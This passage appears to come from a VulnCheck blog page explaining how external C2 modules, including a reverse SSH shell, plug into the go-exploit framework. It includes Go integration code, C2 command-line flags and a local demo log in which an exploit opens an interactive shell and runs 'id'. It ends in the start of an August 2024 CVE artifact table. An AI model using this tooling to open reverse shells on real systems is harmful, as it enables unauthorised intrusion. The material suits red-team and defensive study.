Letting folks trivially define their own payloads and even the ability to catch the callbacks with their own tools from exploits written with go-exploit are primary use cases.",[61,66677,66679],{"id":66678},"hows-it-used-and-why-decouple","How's it used and why decouple?",[18,66681,66682,66683,66688],{},"At the moment, VulnCheck provides a repository for ",[47,66684,66687],{"href":66685,"rel":66686},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002F",[51],"External C2 Experiments",", which stores:",[22,66690,66691,66704],{},[25,66692,66693,66698,66699,59],{},[47,66694,66697],{"href":66695,"rel":66696},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fblob\u002Fmain\u002Fexample\u002Fexternal.go",[51],"Examples & demonstrations"," of how to create a new external C2, as well as ",[47,66700,66703],{"href":66701,"rel":66702},"https:\u002F\u002Fpkg.go.dev\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit@v1.25.0\u002Fc2\u002Fexternal",[51],"Go package documentation for the API",[25,66705,66706,66707,982,66712,66716],{},"Full implementations of C2 channels & demonstration payloads for use with go-exploit that the team believes are great but not quite worthy of fitting the goal of having a \"minimal\" set, such as ",[47,66708,66711],{"href":66709,"rel":66710},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fblob\u002Fmain\u002Fssh\u002FREADME.md",[51],"our reverse SSH implementation",[47,66713,11736],{"href":66714,"rel":66715},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Ftree\u002Fmain\u002Fssh\u002Fpayload",[51]," that can deploy a \"reverse SSH\" session that executes commands from the SSH server to the SSH client that represents the exploited target.",[18,66718,66719],{},"This decoupling allows anyone who wants to develop a complex payload with evasion and C2 channel to create their own repository a-la our experiments repository or 
through a private project when teams want to keep components private, leaving the framework itself to focus on accelerating the speed and quality of exploits versus getting bogged down in the herculean effort of all the other steps. Then, after all that hard work, simply define a new C2 type in the target exploit and be off to the races. For an example of how simple it is to add the reverse SSH C2 to a go-exploit exploit, see below.",[18,66721,66722],{},"Add an import for the C2 module:",[1354,66724,66726],{"className":19022,"code":66725,"language":19024,"meta":219,"style":219},"import c2ssh \"github.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fssh\" \n",[886,66727,66728],{"__ignoreMap":219},[1373,66729,66730,66732,66735,66737,66740],{"class":1375,"line":1376},[1373,66731,19043],{"class":4636},[1373,66733,66734],{"class":4640}," c2ssh ",[1373,66736,183],{"class":1387},[1373,66738,66739],{"class":19053},"github.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fssh",[1373,66741,19057],{"class":1387},[18,66743,66744],{},"Then in the go-exploit project adding support to a exploit as follows:",[1354,66746,66748],{"className":19022,"code":66747,"language":19024,"meta":219,"style":219},"ext := external.GetInstance(c2ssh.Name)\nc2ssh.Configure(ext)\nsupportedC2 := []c2.Impl{\n    c2ssh.SSHServer,\n    c2.SimpleShellServer,\n}\n\nconf := config.NewRemoteExploit(\n    config.ImplementedFeatures{AssetDetection: false, VersionScanning: false, Exploitation: false},\n    config.CodeExecution, supportedC2, \"\", []string{},\n    []string{}, \"\", \"HTTP\", 8080)\nsploit := ExternalSSHTest{}\nexploit.RunProgram(sploit, conf)\n",[886,66749,66750,66776,66792,66811,66823,66834,66838,66842,66860,66899,66926,66953,66964],{"__ignoreMap":219},[1373,66751,66752,66755,66757,66760,66762,66765,66767,66770,66772,66774],{"class":1375,"line":1376},[1373,66753,66754],{"class":4640},"ext ",[1373,66756,20584],{"class":1397},[1373,66758,66759],{"class":4640}," 
external",[1373,66761,59],{"class":1383},[1373,66763,66764],{"class":7297},"GetInstance",[1373,66766,1384],{"class":1383},[1373,66768,66769],{"class":4640},"c2ssh",[1373,66771,59],{"class":1383},[1373,66773,30775],{"class":4640},[1373,66775,11875],{"class":1383},[1373,66777,66778,66780,66782,66785,66787,66790],{"class":1375,"line":220},[1373,66779,66769],{"class":4640},[1373,66781,59],{"class":1383},[1373,66783,66784],{"class":7297},"Configure",[1373,66786,1384],{"class":1383},[1373,66788,66789],{"class":4640},"ext",[1373,66791,11875],{"class":1383},[1373,66793,66794,66797,66799,66802,66804,66806,66809],{"class":1375,"line":1266},[1373,66795,66796],{"class":4640},"supportedC2 ",[1373,66798,20584],{"class":1397},[1373,66800,66801],{"class":1383}," []",[1373,66803,26421],{"class":14938},[1373,66805,59],{"class":1383},[1373,66807,66808],{"class":14938},"Impl",[1373,66810,8904],{"class":1383},[1373,66812,66813,66816,66818,66821],{"class":1375,"line":1852},[1373,66814,66815],{"class":4640},"    c2ssh",[1373,66817,59],{"class":1383},[1373,66819,66820],{"class":4640},"SSHServer",[1373,66822,9062],{"class":1383},[1373,66824,66825,66828,66830,66832],{"class":1375,"line":4692},[1373,66826,66827],{"class":4640},"    c2",[1373,66829,59],{"class":1383},[1373,66831,38204],{"class":4640},[1373,66833,9062],{"class":1383},[1373,66835,66836],{"class":1375,"line":4724},[1373,66837,1855],{"class":1383},[1373,66839,66840],{"class":1375,"line":4756},[1373,66841,6520],{"emptyLinePlaceholder":237},[1373,66843,66844,66847,66849,66852,66854,66857],{"class":1375,"line":4768},[1373,66845,66846],{"class":4640},"conf ",[1373,66848,20584],{"class":1397},[1373,66850,66851],{"class":4640}," config",[1373,66853,59],{"class":1383},[1373,66855,66856],{"class":7297},"NewRemoteExploit",[1373,66858,66859],{"class":1383},"(\n",[1373,66861,66862,66865,66867,66870,66872,66875,66877,66879,66881,66884,66886,66888,66890,66893,66895,66897],{"class":1375,"line":4792},[1373,66863,66864],{"class":14938},"    
config",[1373,66866,59],{"class":1383},[1373,66868,66869],{"class":14938},"ImplementedFeatures",[1373,66871,9149],{"class":1383},[1373,66873,66874],{"class":4640},"AssetDetection",[1373,66876,4606],{"class":1383},[1373,66878,16311],{"class":14985},[1373,66880,5437],{"class":1383},[1373,66882,66883],{"class":4640}," VersionScanning",[1373,66885,4606],{"class":1383},[1373,66887,16311],{"class":14985},[1373,66889,5437],{"class":1383},[1373,66891,66892],{"class":4640}," Exploitation",[1373,66894,4606],{"class":1383},[1373,66896,16311],{"class":14985},[1373,66898,22429],{"class":1383},[1373,66900,66901,66903,66905,66908,66910,66913,66915,66917,66919,66921,66923],{"class":1375,"line":4798},[1373,66902,66864],{"class":4640},[1373,66904,59],{"class":1383},[1373,66906,66907],{"class":4640},"CodeExecution",[1373,66909,5437],{"class":1383},[1373,66911,66912],{"class":4640}," supportedC2",[1373,66914,5437],{"class":1383},[1373,66916,16579],{"class":1387},[1373,66918,5437],{"class":1383},[1373,66920,66801],{"class":1383},[1373,66922,15752],{"class":7293},[1373,66924,66925],{"class":1383},"{},\n",[1373,66927,66928,66931,66933,66936,66938,66940,66942,66944,66946,66948,66951],{"class":1375,"line":4806},[1373,66929,66930],{"class":1383},"    []",[1373,66932,15752],{"class":7293},[1373,66934,66935],{"class":1383},"{},",[1373,66937,16579],{"class":1387},[1373,66939,5437],{"class":1383},[1373,66941,4883],{"class":1387},[1373,66943,6290],{"class":1391},[1373,66945,183],{"class":1387},[1373,66947,5437],{"class":1383},[1373,66949,66950],{"class":5467}," 8080",[1373,66952,11875],{"class":1383},[1373,66954,66955,66957,66959,66962],{"class":1375,"line":4817},[1373,66956,38094],{"class":4640},[1373,66958,20584],{"class":1397},[1373,66960,66961],{"class":14938}," 
ExternalSSHTest",[1373,66963,20595],{"class":1383},[1373,66965,66966,66968,66970,66973,66975,66978,66980,66982],{"class":1375,"line":4825},[1373,66967,22852],{"class":4640},[1373,66969,59],{"class":1383},[1373,66971,66972],{"class":7297},"RunProgram",[1373,66974,1384],{"class":1383},[1373,66976,66977],{"class":4640},"sploit",[1373,66979,5437],{"class":1383},[1373,66981,20633],{"class":4640},[1373,66983,11875],{"class":1383},[18,66985,66986],{},"In the prior snippet, you can see an external C2 defined, added the supported C2 structure, and passed like normal. No other go-exploit modification is required to learn about the server side component.",[18,66988,66989,66990,66993,66994,66997,66998,59],{},"A few things to keep in mind are that the exploit payload ",[1131,66991,66992],{},"must"," be C2 aware and can't make assumptions that the communications channel has support in the ",[886,66995,66996],{},"go-exploit\u002Fpayload"," types. Because of this, the team created an example of a reverse SSH shell that implements a basic C2 to match close to the other internal minimal set examples: ",[47,66999,67002],{"href":67000,"rel":67001},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Fblob\u002Fmain\u002Fssh\u002Fpayload\u002Freverse_shell\u002Freverse_shell.go",[51],"ssh\u002Fpayload\u002Freverse_shell",[18,67004,67005,67006,59],{},"The team has documented the steps for full usage in each of the ",[47,67007,67010],{"href":67008,"rel":67009},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fexternal-c2-experiments\u002Ftree\u002Fmain\u002Fssh#external-c2-ssh",[51],"experiment’s directories",[18,67012,67013],{},"A side-effect of this is that this allows for go-exploit to inherit the command line flag arguments without any changes to the exploit. 
For the preceding, you suddenly have access to the following flags for free:",[1354,67015,67017],{"className":31740,"code":67016,"language":2186,"meta":219,"style":219},"-SSHShellServer.command string\n    Run a single command and exit the payload.\n-SSHShellServer.heartbeat\n    Print heartbeat checkins from the c2\n-SSHShellServer.interactive\n    Run the commands in an interactive shell. (default true)\n-SSHShellServer.server-messages\n    Print server messages to the client\n",[886,67018,67019,67027,67049,67054,67073,67078,67105,67110],{"__ignoreMap":219},[1373,67020,67021,67024],{"class":1375,"line":1376},[1373,67022,67023],{"class":2206},"-SSHShellServer.command",[1373,67025,67026],{"class":1391}," string\n",[1373,67028,67029,67032,67034,67037,67039,67042,67044,67046],{"class":1375,"line":220},[1373,67030,67031],{"class":2206},"    Run",[1373,67033,52105],{"class":1391},[1373,67035,67036],{"class":1391}," single",[1373,67038,16726],{"class":1391},[1373,67040,67041],{"class":1391}," and",[1373,67043,57418],{"class":1391},[1373,67045,57354],{"class":1391},[1373,67047,67048],{"class":1391}," payload.\n",[1373,67050,67051],{"class":1375,"line":1266},[1373,67052,67053],{"class":2206},"-SSHShellServer.heartbeat\n",[1373,67055,67056,67059,67062,67065,67068,67070],{"class":1375,"line":1852},[1373,67057,67058],{"class":2206},"    Print",[1373,67060,67061],{"class":1391}," heartbeat",[1373,67063,67064],{"class":1391}," checkins",[1373,67066,67067],{"class":1391}," from",[1373,67069,57354],{"class":1391},[1373,67071,67072],{"class":1391}," c2\n",[1373,67074,67075],{"class":1375,"line":4692},[1373,67076,67077],{"class":2206},"-SSHShellServer.interactive\n",[1373,67079,67080,67082,67084,67087,67089,67092,67095,67098,67101,67103],{"class":1375,"line":4724},[1373,67081,67031],{"class":2206},[1373,67083,57354],{"class":1391},[1373,67085,67086],{"class":1391}," commands",[1373,67088,57301],{"class":1391},[1373,67090,67091],{"class":1391}," 
an",[1373,67093,67094],{"class":1391}," interactive",[1373,67096,67097],{"class":1391}," shell.",[1373,67099,67100],{"class":4640}," (default ",[1373,67102,10874],{"class":7054},[1373,67104,11875],{"class":4640},[1373,67106,67107],{"class":1375,"line":4756},[1373,67108,67109],{"class":2206},"-SSHShellServer.server-messages\n",[1373,67111,67112,67114,67117,67120,67122,67124],{"class":1375,"line":4768},[1373,67113,67058],{"class":2206},[1373,67115,67116],{"class":1391}," server",[1373,67118,67119],{"class":1391}," messages",[1373,67121,55503],{"class":1391},[1373,67123,57354],{"class":1391},[1373,67125,67126],{"class":1391}," client\n",[18,67128,67129],{},"Of course, everyone likes shells, so here's what it looks like in real exploit usage of the reverse SSH shell server external module:",[1354,67131,67133],{"className":31740,"code":67132,"language":2186,"meta":219,"style":219},"poptart@grimm $ go run exploit.go -lhost 127.0.0.1 -lport 2222 -rhost 127.0.0.1 -rport 1337 -e -fll DEBUG -ell DEBUG -payload ..\u002Fpayload\u002Freverse_shell\u002Freverse_shell\ntime=2024-09-04T12:36:35.970-06:00 level=DEBUG msg=\"Using the HTTP User-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F125.0.0.0 Safari\u002F537.36\"\ntime=2024-09-04T12:36:35.971-06:00 level=STATUS msg=\"Starting target\" index=0 host=127.0.0.1 port=1337 ssl=false \"ssl auto\"=false\ntime=2024-09-04T12:36:35.971-06:00 level=DEBUG msg=\"External SSH Listener starting: 127.0.0.1:2222\"\ntime=2024-09-04T12:36:35.974-06:00 level=DEBUG msg=\"SSH: Handshaking for 127.0.0.1:35222\"\ntime=2024-09-04T12:36:35.977-06:00 level=SUCCESS msg=\"Active shell SSH: Connection accepted from poptart@127.0.0.1:35222 session: 100f32d6dbee3f705dfc41dc3527b5f7b9b3eef845f3ab9e1da1bacd36c41901 (SSH-2.0-OpenSSH_9.7)\"\ntime=2024-09-04T12:36:35.977-06:00 level=STATUS msg=\"Interactive session started\"\nid\ntime=2024-09-04T12:36:41.930-06:00 level=STATUS msg=\"Running command on 
SSH client: 'id'\"\ntime=2024-09-04T12:36:42.082-06:00 level=SUCCESS msg=\"uid=1000(poptart) gid=100(users) groups=100(users),67(libvirtd)\\n\"\n",[886,67134,67135,67186,67213,67271,67296,67322,67348,67373,67377,67403],{"__ignoreMap":219},[1373,67136,67137,67139,67141,67143,67146,67149,67151,67154,67156,67159,67161,67163,67165,67167,67169,67172,67175,67178,67180,67183],{"class":1375,"line":1376},[1373,67138,9373],{"class":2206},[1373,67140,45557],{"class":4640},[1373,67142,19024],{"class":1391},[1373,67144,67145],{"class":1391}," run",[1373,67147,67148],{"class":1391}," exploit.go",[1373,67150,38916],{"class":2209},[1373,67152,67153],{"class":5467}," 127.0.0.1",[1373,67155,38922],{"class":2209},[1373,67157,67158],{"class":5467}," 2222",[1373,67160,38910],{"class":2209},[1373,67162,67153],{"class":5467},[1373,67164,45568],{"class":2209},[1373,67166,45581],{"class":5467},[1373,67168,38907],{"class":2209},[1373,67170,67171],{"class":2209}," -fll",[1373,67173,67174],{"class":1391}," DEBUG",[1373,67176,67177],{"class":2209}," -ell",[1373,67179,67174],{"class":1391},[1373,67181,67182],{"class":2209}," -payload",[1373,67184,67185],{"class":1391}," ..\u002Fpayload\u002Freverse_shell\u002Freverse_shell\n",[1373,67187,67188,67190,67192,67195,67197,67199,67202,67204,67206,67208,67211],{"class":1375,"line":220},[1373,67189,38930],{"class":4640},[1373,67191,5417],{"class":1397},[1373,67193,67194],{"class":1391},"2024-09-04T12:36:35.970-06:00",[1373,67196,38938],{"class":4640},[1373,67198,5417],{"class":1397},[1373,67200,67201],{"class":1391},"DEBUG",[1373,67203,38946],{"class":4640},[1373,67205,5417],{"class":1397},[1373,67207,183],{"class":1387},[1373,67209,67210],{"class":1391},"Using the HTTP User-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F125.0.0.0 
Safari\u002F537.36",[1373,67212,19057],{"class":1387},[1373,67214,67215,67217,67219,67222,67224,67226,67228,67230,67232,67234,67236,67238,67240,67242,67244,67246,67248,67250,67252,67254,67257,67259,67261,67263,67265,67267,67269],{"class":1375,"line":1266},[1373,67216,38930],{"class":4640},[1373,67218,5417],{"class":1397},[1373,67220,67221],{"class":1391},"2024-09-04T12:36:35.971-06:00",[1373,67223,38938],{"class":4640},[1373,67225,5417],{"class":1397},[1373,67227,38943],{"class":1391},[1373,67229,38946],{"class":4640},[1373,67231,5417],{"class":1397},[1373,67233,183],{"class":1387},[1373,67235,38979],{"class":1391},[1373,67237,183],{"class":1387},[1373,67239,38984],{"class":4640},[1373,67241,5417],{"class":1397},[1373,67243,445],{"class":1391},[1373,67245,38991],{"class":4640},[1373,67247,5417],{"class":1397},[1373,67249,48753],{"class":1391},[1373,67251,38999],{"class":4640},[1373,67253,5417],{"class":1397},[1373,67255,67256],{"class":1391},"1337",[1373,67258,39007],{"class":4640},[1373,67260,5417],{"class":1397},[1373,67262,5971],{"class":1391},[1373,67264,4883],{"class":1387},[1373,67266,39016],{"class":1391},[1373,67268,183],{"class":1387},[1373,67270,39021],{"class":1391},[1373,67272,67273,67275,67277,67279,67281,67283,67285,67287,67289,67291,67294],{"class":1375,"line":1852},[1373,67274,38930],{"class":4640},[1373,67276,5417],{"class":1397},[1373,67278,67221],{"class":1391},[1373,67280,38938],{"class":4640},[1373,67282,5417],{"class":1397},[1373,67284,67201],{"class":1391},[1373,67286,38946],{"class":4640},[1373,67288,5417],{"class":1397},[1373,67290,183],{"class":1387},[1373,67292,67293],{"class":1391},"External SSH Listener starting: 
127.0.0.1:2222",[1373,67295,19057],{"class":1387},[1373,67297,67298,67300,67302,67305,67307,67309,67311,67313,67315,67317,67320],{"class":1375,"line":4692},[1373,67299,38930],{"class":4640},[1373,67301,5417],{"class":1397},[1373,67303,67304],{"class":1391},"2024-09-04T12:36:35.974-06:00",[1373,67306,38938],{"class":4640},[1373,67308,5417],{"class":1397},[1373,67310,67201],{"class":1391},[1373,67312,38946],{"class":4640},[1373,67314,5417],{"class":1397},[1373,67316,183],{"class":1387},[1373,67318,67319],{"class":1391},"SSH: Handshaking for 127.0.0.1:35222",[1373,67321,19057],{"class":1387},[1373,67323,67324,67326,67328,67331,67333,67335,67337,67339,67341,67343,67346],{"class":1375,"line":4724},[1373,67325,38930],{"class":4640},[1373,67327,5417],{"class":1397},[1373,67329,67330],{"class":1391},"2024-09-04T12:36:35.977-06:00",[1373,67332,38938],{"class":4640},[1373,67334,5417],{"class":1397},[1373,67336,39062],{"class":1391},[1373,67338,38946],{"class":4640},[1373,67340,5417],{"class":1397},[1373,67342,183],{"class":1387},[1373,67344,67345],{"class":1391},"Active shell SSH: Connection accepted from poptart@127.0.0.1:35222 session: 100f32d6dbee3f705dfc41dc3527b5f7b9b3eef845f3ab9e1da1bacd36c41901 (SSH-2.0-OpenSSH_9.7)",[1373,67347,19057],{"class":1387},[1373,67349,67350,67352,67354,67356,67358,67360,67362,67364,67366,67368,67371],{"class":1375,"line":4756},[1373,67351,38930],{"class":4640},[1373,67353,5417],{"class":1397},[1373,67355,67330],{"class":1391},[1373,67357,38938],{"class":4640},[1373,67359,5417],{"class":1397},[1373,67361,38943],{"class":1391},[1373,67363,38946],{"class":4640},[1373,67365,5417],{"class":1397},[1373,67367,183],{"class":1387},[1373,67369,67370],{"class":1391},"Interactive session 
started",[1373,67372,19057],{"class":1387},[1373,67374,67375],{"class":1375,"line":4768},[1373,67376,9460],{"class":2206},[1373,67378,67379,67381,67383,67386,67388,67390,67392,67394,67396,67398,67401],{"class":1375,"line":4792},[1373,67380,38930],{"class":4640},[1373,67382,5417],{"class":1397},[1373,67384,67385],{"class":1391},"2024-09-04T12:36:41.930-06:00",[1373,67387,38938],{"class":4640},[1373,67389,5417],{"class":1397},[1373,67391,38943],{"class":1391},[1373,67393,38946],{"class":4640},[1373,67395,5417],{"class":1397},[1373,67397,183],{"class":1387},[1373,67399,67400],{"class":1391},"Running command on SSH client: 'id'",[1373,67402,19057],{"class":1387},[1373,67404,67405,67407,67409,67412,67414,67416,67418,67420,67422,67424,67427],{"class":1375,"line":4798},[1373,67406,38930],{"class":4640},[1373,67408,5417],{"class":1397},[1373,67410,67411],{"class":1391},"2024-09-04T12:36:42.082-06:00",[1373,67413,38938],{"class":4640},[1373,67415,5417],{"class":1397},[1373,67417,39062],{"class":1391},[1373,67419,38946],{"class":4640},[1373,67421,5417],{"class":1397},[1373,67423,183],{"class":1387},[1373,67425,67426],{"class":1391},"uid=1000(poptart) gid=100(users) groups=100(users),67(libvirtd)\\n",[1373,67428,19057],{"class":1387},[18,67430,67431],{},"Historically, many of these components interact with some sort of console or a framework for catching and managing caught callbacks. One thing this decoupling allows for is exploits written in go-exploit to move to more of an API-driven management, which lets the framework move beyond catching simple TCP or TLS shells and interacts with those frameworks directly. This is further helped by the fact that go-exploit is designed to output in JSON or structured formats. 
The server-to-client or client-to-server distinction quickly becomes an abstracted component and lets go-exploit integrate with anyone who can write that external C2 module for your favorite tooling.",[61,67433,67435],{"id":67434},"support-experimentation","Support experimentation",[18,67437,67438],{},"VulnCheck believes that there are lots of lesser-known or less battle-tested techniques for C2 communications that are just sitting on the table for attackers. Over the years, I've Discussed how routing protocols have the potential to be used for exfiltration due to firewall rules being more permissive about allowing for routing. I’ve also highlighted how statically interacting with web applications for using Slack\u002FTeams\u002FDropbox\u002Fetc was error-prone and how having a C2 channel that could use dynamically evaluated interactions could increase stability and stealth or how many shared object reflections that have long been popular with real-world malware never trickled into the mainstream OSS security tooling. All of these have been little experiments I've messed with but have been difficult to directly plug and play into real-world exploits… until now.",[18,67440,67441],{},"Experimentation should be easy and having a framework that allows for easy and agnostic interaction allows for more \"cool weirdness\" to propagate. Ideally, this creates an environment where both attackers and defenders can focus on fundamentals.",[61,67443,67445],{"id":67444},"the-future-integrating-c2s","The future & integrating C2s",[18,67447,67448],{},"Of course, this isn't the end. There are some sharp edges around ensuring that binary payload delivery is more supported in the framework; more examples, programmatic exploit input, and examples of supporting C2 frameworks are all in the works. 
The team also has more work to do to support external frameworks by allowing the external C2 channels to declare what types of payloads they support to exploit the payload to C2 channels and explicitly declare dependencies.",[18,67450,67451],{},"The team also believes that the C2 integration allows for some of the most powerful interactions with targets via go-exploit. We look forward to establishing a community for those who want to interact with go-exploit.",[18,67453,67454,67455,67460],{},"The world in which you can plug Go exploit into your favorite platform isn’t far away. This wil enable your next Red Team with all of the excellent exploits written in go-exploit and the ",[47,67456,67459],{"href":67457,"rel":67458},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Finitial-access-intelligence\u002Ffetch-artifacts",[51],"large collection of VulnCheck Initial Access Intelligence exploits"," that we provide to customers.",[2901,67462,67463],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sP9PO, html code.shiki .sP9PO{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#E6DB74}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: 
var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sKvfc, html code.shiki 
.sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":67465},[67466,67467,67468],{"id":66678,"depth":220,"text":66679},{"id":67434,"depth":220,"text":67435},{"id":67444,"depth":220,"text":67445},"Adding support for external C2 channels and payloads in the go-exploit framework to enable flexible exploitation interaction and platform 
integration.",{"slug":67471},"go-exploit-external-c2s","\u002Fblog\u002Fgo-exploit-external-c2s",{"title":66602,"description":67469},"blog\u002Fgo-exploit-external-c2s","uvhDhwV3xF3nhQjTiBTJZikxF0A2tcbBV0N_qxNDdAw",{"id":67477,"title":67478,"articles":7,"authors":67479,"body":67481,"date":68005,"description":68006,"extension":234,"image":7,"link":7,"meta":68007,"navigation":237,"path":68008,"seo":68009,"series":7,"stem":68010,"subtype":7,"tags":68011,"__hash__":68012},"blog\u002Fblog\u002Finitial-access-intelligence-august-2024.md","VulnCheck Initial Access Intelligence Update - August 2024",[67480],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":67482,"toc":68000},[67483,67485,67488,67491,67497,67500,67516,67520,67986,67988,67993,67995],[18,67484,59412],{},[18,67486,67487],{},"In August 2024, VulnCheck crossed 270+ Initial Access Intelligence (IAI) artifacts, developing artifacts for 20 CVEs, covering 17 different vendors and products.",[18,67489,67490],{},"It's worth mentioning that CVE-2024-38856, affecting Apache OFBiz, had detection artifacts published by VulnCheck on August 5, 2024. The vulnerability was later confirmed as exploited in the wild by Fortinet on August 19, 2024, and CISA on August 27, 2024.",[18,67492,67493],{},[68,67494],{":width":10862,"alt":67495,"src":67496},"Initial Access Intelligence - July 2024","\u002Fblog\u002Finitial-access-intelligence-august-2024\u002Finitial-access-august-2024.png",[18,67498,67499],{},"To provide better visibility into these updates, we've broken down August's Initial Access Intelligence Artifacts by CVE. 
For each CVE, we provide a range of detection tools including:",[22,67501,67502,67504,67506,67508,67510,67512,67514],{},[25,67503,325],{},[25,67505,59440],{},[25,67507,59443],{},[25,67509,59446],{},[25,67511,59449],{},[25,67513,59452],{},[25,67515,64745],{},[61,67517,67519],{"id":67518},"august-2024-initial-access-artifacts","August 2024 Initial Access Artifacts",[307,67521,67522,67544],{},[310,67523,67524],{},[313,67525,67526,67528,67530,67532,67534,67536,67538,67540,67542],{},[316,67527,59471],{},[316,67529,59474],{},[316,67531,319],{},[316,67533,59479],{},[316,67535,59482],{},[316,67537,59485],{},[316,67539,59488],{},[316,67541,61654],{},[316,67543,61657],{},[336,67545,67546,67569,67591,67613,67635,67657,67679,67701,67723,67745,67767,67789,67810,67832,67854,67876,67898,67920,67942,67964],{},[313,67547,67548,67551,67554,67557,67559,67561,67563,67565,67567],{},[341,67549,67550],{},"Exim SPA Auth Bypass",[341,67552,67553],{},"2024-08",[341,67555,67556],{},"CVE-2020-12783",[341,67558,59510],{},[341,67560,59510],{},[341,67562,59510],{},[341,67564,59510],{},[341,67566],{},[341,67568],{},[313,67570,67571,67574,67576,67579,67581,67583,67585,67587,67589],{},[341,67572,67573],{},"GNU GLIBC \"Looney Tunables\" Local Privilege Escalation",[341,67575,67553],{},[341,67577,67578],{},"CVE-2023-4911",[341,67580,59510],{},[341,67582,59510],{},[341,67584],{},[341,67586],{},[341,67588],{},[341,67590,59510],{},[313,67592,67593,67596,67598,67601,67603,67605,67607,67609,67611],{},[341,67594,67595],{},"Anyscale Ray CPU Profile Command Injection",[341,67597,67553],{},[341,67599,67600],{},"CVE-2023-6019",[341,67602,59510],{},[341,67604,59510],{},[341,67606,59510],{},[341,67608,59510],{},[341,67610,59510],{},[341,67612],{},[313,67614,67615,67618,67620,67623,67625,67627,67629,67631,67633],{},[341,67616,67617],{},"WooCommerce Payments Authentication 
